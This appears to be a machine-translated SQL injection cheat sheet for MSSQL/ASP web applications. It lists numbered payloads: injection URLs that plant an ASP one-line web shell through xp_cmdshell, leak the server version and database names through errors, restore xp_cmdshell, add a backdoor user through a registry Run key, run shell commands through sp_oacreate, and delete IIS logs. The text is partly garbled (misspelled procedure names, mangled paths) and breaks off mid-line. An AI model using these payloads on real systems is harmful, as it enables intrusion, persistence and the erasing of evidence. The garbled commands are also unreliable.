1. Use ^ escape characters to write ASP (one-sentence Trojan Horse) files:
? Http: // 192.168.1.5/display. asp? Keyno = 1881; exec master. dbo. xp_cmdshell echo ^ <script language = VBScript runat = server ^> execute request ^ ("l" ^) ^ </script ^> c: mu. asp ;--
? Echo ^ <% execute ^ (request ^ ("l" ^) % ^> c: mu. asp
2. display the SQL System Version:
? Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (select @ VERSION)
? Http://www.xxxx.com/FullStory.asp? Id = 1 and 1 = convert (int, @ version )--
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft ole db Provider for ODBC Drivers error 80040e07
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value Microsoft SQL Server 2000-8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) to a column of data type int.
/Display. asp, Row 17
3. When detecting Sony's Chinese website vulnerabilities, it is clearly determined that the vulnerability exists, but the corresponding types cannot be found in these three vulnerabilities. By accident, I thought that the keyword "in" can be used in SQL, for example, "select * from mytable where id in (1 )", the value in the brackets is the data we submit. The result is exactly the same as the query result using "select * from mytable where id = 1. So when you access the page, add ") and 1 = 1 and 1 in (1" after the URL, the original SQL statement becomes "select * from mytable where id in (1) and 1 = 1 and 1 in (1) ", this will show the long-awaited page. For the moment, this type of vulnerability is called "include number type". If you are smart, you must think of "include number type. By the way, it is caused by a query statement similar to "select * from mytable where name in (firstsee.
4. Determine whether the xp_mongoshell extended storage process exists:
Http: // 192.168.1.5/display. asp? Keyno = 188 and 1 = (select count (*) FROM master. dbo. sysobjects where xtype = x and name = xp_mongoshell)
Command for restoring xp_mongoshell extended storage:
Http://www.test.com/news/show1.asp? Newsid= 125272
; Exec master. dbo. sp_addextendedproc xp_mongoshell, e: inetputwebxplog70.dll ;--
5. Write command lines and execution programs to the Startup Group:
Http: // 192.168.1.5/display. asp? Keyno = 188; EXEC master. dbo. xp_regwrite hkey_local_machine,softwaremicrosoftwindowscur=versionrun,help1,reg_sz,cmd.exe/c net user test ptlove/add
6. view the current database name:
? Asp? Keyno = 188 "> http: // 192.168.1.5/display. asp? Keyno = 188 and 0 <> change db_name (n) n to 0, 1, 2, 3 ...... Cross-Database
? Http://www.xxxx.com/FullStory.asp? Id = 1 and 1 = convert (int, db_name ())--
Microsoft VBScript compiler error 800a03f6
End missing
/IisHelp/common/500-100.asp, row 242
Microsoft ole db Provider for ODBC Drivers error 80040e07
[Microsoft] [odbc SQL Server Driver] [SQL Server] Syntax error converting the nvarchar value huidahouse to a column of data type int.
/Display. asp, Row 17
7. list all current database names:
Select * from master. dbo. sysdatabases to list records of all columns
Select name from master. dbo. sysdatabases only lists records in the name column
8. xp_cmdshell is not required to support running the CMD command on SQL servers with injection vulnerabilities:
Create TABLE mytmp (info VARCHAR (400), ID int IDENTITY () not null)
DECLARE @ shell INT
DECLARE @ fso INT
DECLARE @ file INT
DECLARE @ isEnd BIT
DECLARE @ out VARCHAR (400)
EXEC sp_oacreate wscript. shell, @ shell output
EXEC sp_oamethod @shell,run,null,cmd.exe/c dir c:> c: emp.txt, 0, true
-- Note that the run parameter true indicates the result of waiting for the program to run. This parameter must be used for long-time commands similar to ping.
EXEC sp_oacreate scripting. filesystemobject, @ fso output
EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt
-- Because the fso opentextfile method returns a textstream object, @ file is an object token.
WHILE @ shell> 0
BEGIN
EXEC sp_oamethod @ file, Readline, @ out
Insert into mytmp (info) VALUES (@ out)
EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out
IF @ isEnd = 1 BREAK
ELSE CONTINUE
END
Drop TABLE MYTMP
----------
DECLARE @ shell INT
DECLARE @ fso INT
DECLARE @ file INT
DECLARE @ isEnd BIT
DECLARE @ out VARCHAR (400)
EXEC sp_oacreate wscript. shell, @ shell output
EXEC sp_oamethod @shell,run,null,cmd.exe/c cscript C: InetpubAdminScriptsadsutil. vbs set/W3SVC/InProcessIsapiApps "C: WINNTsystem32idq. dll "" C: WINNTsystem32inetsrvhttpext. dll "" C: WINNTsystem32inetsrvhttpodbc. dll "" C: WINNTsystem32inetsrvssinc. dll "" C: WINNTsystem32msw3prt. dll "" C: winntsystem32inetsrvasp. dll "> c: emp.txt, 0, true
EXEC sp_oacreate scripting. filesystemobject, @ fso output
EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt
WHILE @ shell> 0
BEGIN
EXEC sp_oamethod @ file, Readline, @ out
Insert into mytmp (info) VALUES (@ out)
EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out
IF @ isEnd = 1 BREAK
ELSE CONTINUE
END
Add WEB users to the Administrator group in one row:
DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate wscript. shell, @ shell output EXEC sp_oamethod @shell,run,null,cmd.exe/c cscript C: InetpubAdminScriptsadsutil. vbs set/W3SVC/InProcessIsapiApps "C: WINNTsystem32idq. dll "" C: WINNTsystem32inetsrvhttpext. dll "" C: WINNTsystem32inetsrvhttpodbc. dll "" C: WINNTsystem32inetsrvssinc. dll "" C: WINNTsystem32msw3prt. dll "" C: winntsystem32inetsrvasp. dll "> c: emp.txt, 0, true EXEC sp_oacreate scripting. filesystemobject, @ fso output EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt WHILE @ shell> 0 begin exec sp_oamethod @ file, Readline, @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END
Execute the EXE program in one line:
DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate wscript. shell, @ shell output EXEC sp_oamethod @shell,run,null,cmd.exe/c cscript.exe E: jeea.net. cnscoreftsimagesiis. vbs lh1 c:> c: emp.txt, 0, true EXEC sp_oacreate scripting. filesystemobject, @ fso output EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt WHILE @ shell> 0 begin exec sp_oamethod @ file, Readline, @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END
Three methods for executing CMD commands in SQL:
Delete log 7.18 first:
(1) exec master. dbo. xp_shareshell del C: winntsystem32logfilesW3SVC5ex050718. log> c: emp.txt
(2) DECLARE @ shell int declare @ fso int declare @ file int declare @ isEnd bit declare @ out VARCHAR (400) EXEC sp_oacreate wscript. shell, @ shell output EXEC sp_oamethod @shell,run,null,cmd.exe/c del C: winntsystem32logfilesW3SVC5ex050718. log> c: emp.txt, 0, true EXEC sp_oacreate scripting. filesystemobject, @ fso output EXEC sp_oamethod @ fso, opentextfile, @ file out, c: emp.txt WHILE @ shell> 0 begin exec sp_oamethod @ file, Readline, @ out insert into mytmp (info) VALUES (@ out) EXEC sp_oagetproperty @ file, AtEndOfStream, @ isEnd out IF @ isEnd = 1 BREAK ELSE CONTINUE END
(3) First, enable the jet sandbox mode. You can modify the Registry by extending the Stored Procedure xp_regwrite. The administrator cannot prevent the modification. For security reasons, the default sandbox mode is not enabled, Which is why xp_regwrite is required. xp_regwrite requires at least the DB_OWNER permission. For convenience, we recommend that you use sysadmin for permission testing:
? Exec master.. xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftJet4.0Engines, SandBoxMode, REG_DWORD, 1
Note:
0. disable everything (default)
1 enable ACCESS, but Disable other
2. ACCESS is forbidden, but other
3. Enable everything
? Here, only the commands used with the sysadmin permission are provided:
Select